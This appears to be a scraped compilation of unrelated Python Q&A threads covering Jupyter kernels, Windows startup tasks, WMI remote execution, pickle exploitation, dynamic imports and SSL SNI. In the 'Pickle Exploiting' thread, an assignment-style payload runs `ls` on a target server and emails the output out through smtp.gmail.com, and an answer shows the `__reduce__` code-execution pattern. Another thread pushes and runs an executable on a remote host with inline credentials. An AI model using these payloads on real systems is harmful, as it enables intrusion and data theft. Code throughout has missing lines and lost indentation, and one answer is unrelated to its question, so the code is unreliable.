Executing code in ipython kernel with the KernelClient API - python

I have an existing ipython kernel, with a communication file 'path/comm_file.json' and I want to execute code in this kernel using the Kernel Client API (actually I'm not picky, any method will do..). I understood that this is the best way to do things from the jupyter documentation. So I write the following code:
from jupyter_client import KernelClient
client = KernelClient(connection_file='path/comm_file.json')
client.execute('a = 10')
But the execute method leads to the following error:
File "C:\Python27\lib\site-packages\jupyter_client\client.py", line 249, in execute
File "C:\Python27\lib\site-packages\jupyter_client\client.py", line 143, in shell_channel
socket, self.session, self.ioloop
TypeError: object.__new__() takes no parameters
What am I doing wrong here??

I am also trying to figure out how the client works. Here's a place to start:
For a simple blocking client you can have a look a how jupyter_test_client and jupyter_console works.
from pprint import pprint
from jupyter_client.consoleapp import JupyterConsoleApp
class MyKernelApp(JupyterConsoleApp):
def __init__(self, connection_file, runtime_dir):
self._dispatching = False
self.existing = connection_file
self.runtime_dir = runtime_dir
app = MyKernelApp("connection.json", "/tmp")
kc = app.kernel_client
kc.execute("print 'hello'")
msg = kc.iopub_channel.get_msg(block=True, timeout=1)
You will need helper functions to handle properly the zmq channels and json messages.

I was able to make a simple and bare KernelClient work for me with this:
from jupyter_client.blocking import BlockingKernelClient
kc = BlockingKernelClient(connection_file='path/comm_file.json')
msgid = kc.execute('a = 10')
reply = kc.get_shell_msg(timeout=5)
That's indeed how JupyterConsoleApp (used by jupyter_console) initializes its client when an existing kernel file is given.


How to run python program automatically even if system restarted

I want to run my python API continuously (means program API will all-time active if call then it work) even if a system restarts my python API automatically restart.
I have API URL: http://localhost:8002/city_id_pred?id=1,2 through this URL calling python API.
import web
import pyodbc
import re
import numpy as np
#from wordcloud import WordCloud, STOPWORDS
from collections import Counter
from sklearn.externals import joblib
import pandas as pd
cnxn = pyodbc.connect('')
cursor = cnxn.cursor()
urls = (
'/city_id_pred?', 'Predict'
#'/', 'MyApplication'
class Predict(web.application):
def run(self, port=8080, *middleware):
func = self.wsgifunc(*middleware)
return web.httpserver.runsimple(func, ('', port))
print("Start class...")
def GET(self):
#here prediction model
if __name__ == "__main__":
app = Predict(urls, globals())
Please suggest
Actually, I want to run on window server but currently using in windows OS.
As #Mubarak said, you basically want to convert it to a .exe and then add that .exe to startup.
I would recommend that you do this by using PyInstaller and then following this tutorial on how to add that .exe to your startup.
Following step will help you:
Make your python code like example.py
Convert example.py to example.exe file by using auto-py-to-exe https://pypi.org/project/auto-py-to-exe/
Open Task Schedular in your window system
Create Task->Gentral Tab ->Give Name,Location
Trigger Tab->Bigin the Task->On Startup
Hope this helps
Following given steps,.
1.Convert your python file to .exe format(https://pypi.org/project/auto-py-to-exe/)
Make simple batch file to run the .exe file which your python file.
#echo off
cd "C:\Program Files\Google\Chrome\Application\"
Start chrome.exe
start – "C:\Program Files\Microsoft Office\Office15\WINWORD.EXE"
"C:\Work\MUO\How to Batch Rename.docx"
cd "C:\Program Files (x86)\VMware\VMware Player"
start vmplayer.exe
Hope your understood,....

Using WMI-Client-Wrapper to execute an exe and get output logs

I am using Ubuntu 16.04 and am using WMI-CLient-Wrapper module to connect to a remote Windows Machine and send an executable to it(eg. Process Explorer) and further execute it and collect the logs it creates and fetch them back to my Linux Machine for further processing. Using WMI CLient Wrapper is the only option available as WMI Module doesn't work with Linux.
I am able to send the file to the remote Windows machine, by establishing a connection using WMI-Client-Wrapper and SMB File Transfer Mechanism. After that when I try to create a Process for the same and try to execute that process it gives me an error stating that some of the attributes that WMI actually has, are not supported by WMI client Wrapper.
What I tried
Python Code:
import os
import wmi_client_wrapper as wmic
from socket import *
import time
wmic = wmic.WmiClientWrapper(
host ="",
username = "LegalWrongDoer",
password = "sasuke14"
str = "smbclient //$ -U LegalWrongDoer%sasuke14 -c \'put \"procexp64.exe\"\'"
print("Folder sent")
process_startup = wmic.Win32_ProcessStartup.new()
process_startup.ShowWindow = SW_SHOWNORMAL
process_id, result = wmic.Win32_Process.Create(CommandLine="C:/procexp64.exe", ProcessStartupInformation=process_startup)
process_startup.ShowWindow = SW_SHOWNORMAL
if result == 0:
print("Process started successfully")
print("Sorry, but can't execute Process!")
When I run this python file, it gives me the output to the initial query I make. But the Process_StartUp fails.
Further Traceback Calls:
Traceback (most recent call last):
File "WMIClient.py", line 22, in <module>
process_startup = wmic.Win32_ProcessStartup.new()
AttributeError: 'WmiClientWrapper' object has no attribute 'Win32_ProcessStartup'
I'd be extremely grateful if anyone of you can be able to help me through this. Thanks in advance :)
Well I finally managed to get a work-around for this whole scenario, and it might look a little messy but it sure does work for me.
Firstly I use smbclient to transfer the executable to the end-point where I want to execute it. Inside my code I use os.system() calls to make this happen.
import os
str1 = "smbclient //'<HostMachineIP>'/admin$ -U '<domain>\\<username>%<password>' -c \'lcd /usr/local/acpl/bin/endPoint/; put \"EndPointForeignsics.exe\"\'"
This helps me put the executable in desired shared folder that the user has access(Admin in my case) to and then use WMI-query through a tool called Winexe to get access to the console/command prompt of the end-point. I use another os.system() call to execute this again.
str2 = r'/usr/local/bin/winexe -U "<domain>\\<username>%<password>" //<HostMachineIP> "cmd /c c:\windows\EndPointForeignsics.exe '
P.S:-- Winexe is a tool that you'll have to download off the internet and compile it. It may take some time and effort to do that, but is quite achievable. You'll get a lot of help on the same from StackOverflow and Documentation of the tool.

Pickle Exploiting

I have an assignment to send a pickle file to a server which unpickles anything sent to it. My plan is to have it email me back the ls command printed out. I have this file:
import smtplib
import commands
status, output = commands.getstatusoutput("ls")
server = smtplib.SMTP_SSL('smtp.gmail.com')
server.login("...#gmail.com", "password")
server.sendmail("...#gmail.com", "...#gmail.com", output)
How can I get the server to run this? I am trying to send a file like:
with the python script in the ' '.
I was thinking something like:
(S'python\n import smptlib\n ...'
but it doesn't execute the commands. How can I make it execute the python?
I've tried on my own computer and the python sends the email fine.
Do whatever friendlyness you want to do in the __reduce__ method. Please don't be evil.
import pickle
class Friendly:
def __reduce__(self):
return (self.friendly, ('executing friendly code',))
def friendly(x):
pickle.dump(Friendly(), open('pickled', 'wb'))
print('loading ...')
pickle.load(open('pickled', 'rb'))
$ python friendly.py
loading ...
executing friendly code

Python - Access "import" from within a class

This has been vexing me for a while now. I am trying to create a very simple REST-like interface (without using third-party libraries, which I know are available).
The idea behind it is that I can have a directory, for example mylib, where I can drop in python files, like do_something.py and, by POSTing to http://localhost/do_something the code will spring into life and do something!
I think I have managed to get somewhere near to my goal with the following structure:
The contents of the files are as follows.
from http.server import HTTPServer
from http.server import BaseHTTPRequestHandler
import json, logging
from mylib import my_module
class MyRequestHandler (BaseHTTPRequestHandler):
# Send JSON responses
# -----------
def send_json(self, json_message, response_code=200):
self.send_header('Content-type', 'application/json')
# Get JSON requests
# ----------
def get_json(self):
body = self.rfile.read(int(self.headers.get('Content-Length')))
if (body):
receivedData = json.loads(body.decode())
self.send_json({"Status": "Error", "Message": "Invalid JSON received"}, 400)
receivedData = None
receivedData = None
return receivedData
# ---------
def do_POST(self):
module_to_call = (self.path).replace('/', '.')[1:]
if module_to_call.endswith('.'): # Remove trailing dot
module_to_call = module_to_call[:-1]
print("Path is: '" + module_to_call + "'")
# invoke function
module_to_call = getattr(self, module_to_call)
response = module_to_call()
# --------
def do_GET(self):
# -----------------------------------------------------------------------------
# Server startup code
# -------------------
def start_server():
# Begin serving
# -------------
port = 8003
server = HTTPServer(('', port), MyRequestHandler)
print(("Server now running on port {0} ...").format(port))
# -----------------------------------------------------------------------------
# Start the Server
# ----------------
if __name__ == '__main__':
def my_module():
print("Hello World!")
return{'Greeting': 'Hello World!'}
When I fire up the server and attempt to POST to http://localhost:8003/my_module, I get the following output:
Server now running on port 8003 ...
Path is: 'my_module'
Exception happened during processing of request from ('', 59541)
Traceback (most recent call last):
File "C:\Users\Test\AppData\Local\Programs\Python\Python35-32\lib\socketserver.py", line 313, in _handle_request_noblock
self.process_request(request, client_address)
File "C:\Users\Test\AppData\Local\Programs\Python\Python35-32\lib\socketserver.py", line 341, in process_request
self.finish_request(request, client_address)
File "C:\Users\Test\AppData\Local\Programs\Python\Python35-32\lib\socketserver.py", line 354, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "C:\Users\Test\AppData\Local\Programs\Python\Python35-32\lib\socketserver.py", line 681, in __init__
File "C:\Users\Test\AppData\Local\Programs\Python\Python35-32\lib\http\server.py", line 422, in handle
File "C:\Users\Test\AppData\Local\Programs\Python\Python35-32\lib\http\server.py", line 410, in handle_one_request
File ".\example.py", line 43, in do_POST
module_to_call = getattr(self, module_to_call)
AttributeError: 'MyRequestHandler' object has no attribute 'my_module'
This makes perfect sense, since 'MyRequestHandler" does not have an attribute "my_module"! What I can't wrap my head around, is how to fix this?
Should I pass "mylib" into MyRequestHandler? Should I perform the import within the class (but then the functionality would only be available within the class)?
I'm trying to keep things clean and simple, so that even a Python novice (like I seem to be!) can just write a standalone script, drop it into "mylib" and everything "just works". The novice could visit the web address of their script and have it magically run.
Any help or advice would be gratefully received.
Use the __import__() method:
temp = __import__('mylib', globals(), locals(), ['module_to_call'], -1)
response = temp.module_to_call()
I use 2.6 at work, and this is usually used by those using even 2.7 because the importlib module is far more robust in 3. If you are using 3 you can do the following:
from importlib import import_module
temp = import_module('mylib')
but now you have to use getattr to get the function you want to be called
func_to_call = getattr(temp, 'module_to_call')
response = func()
Or you can have a dictionary of functions in another module, but that will require a lot of work as that dictionary grows.

Shell not honoring interpreter?

I downloaded Python 3.4 sources, built the sources, and installed them in /usr/local. make test ran fine.
$ ls /usr/local/bin/ | grep python
I've got a little script that tries to use SNI. SNI has been giving me trouble in Python (re: wrap_socket() got an unexpected keyword argument 'server_hostname'?), and a newer version of Python is supposed to fix it. The script looks like so:
import sys, ssl, socket
s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2 = ssl.wrap_socket(s1,
s2.connect( ("localhost", 8443) )
s2.send("GET / ")
s2.send("Hostname: localhost")
When I attempt to run it, I still receive that damn TypeError: wrap_socket() got an unexpected keyword argument 'server_hostname' error.
EDIT: I tried Lukas' suggestion below and changed the line to:
s2 = ssl.SSLContext.wrap_socket(s1,
Now, when I run the script my mouse pointer (the arrow that's slanted left) turns into the cross hairs (the plus sign) and I can drag boxes around the screen. After a minute or so, I get the following error:
$ ./fetch.sh
./fetch.sh: line 5: syntax error near unexpected token `('
./fetch.sh: line 5: `s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)'
After the above fails and the pointer returns to normal, I actually have a single image of screen captures of the boxes I drew on the screen.
I'm beginning to think Python is a major pain in the ass and a waste of time. How can anyone justify two days of work when trying to do something simple like specifying a hostname in SSL?
Any ideas what I am doing wrong this time?
The patch you're mentioning in the other question adds a server_hostname argument to the method ssl.SSLContext.wrap_socket.
The function you're calling is ssl.wrap_socket however, which doesn't take a keyword argument server_hostname.
Edit: Try this:
from ssl import CERT_NONE
from ssl import PROTOCOL_SSLv23
from ssl import SSLSocket
import ssl, socket
import time
s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def wrap_socket_with_sni(sock, keyfile=None, certfile=None,
server_side=False, cert_reqs=CERT_NONE,
ssl_version=PROTOCOL_SSLv23, ca_certs=None,
return SSLSocket(sock=sock, keyfile=keyfile, certfile=certfile,
server_side=server_side, cert_reqs=cert_reqs,
ssl_version=ssl_version, ca_certs=ca_certs,
ciphers=ciphers, server_hostname=server_hostname)
s2 = wrap_socket_with_sni(s1,
# ...
All I did was copy over the wrap_socket helper function, extend it with a server_hostname keyword argument, and pass that along to the SSLSocket that it returns.
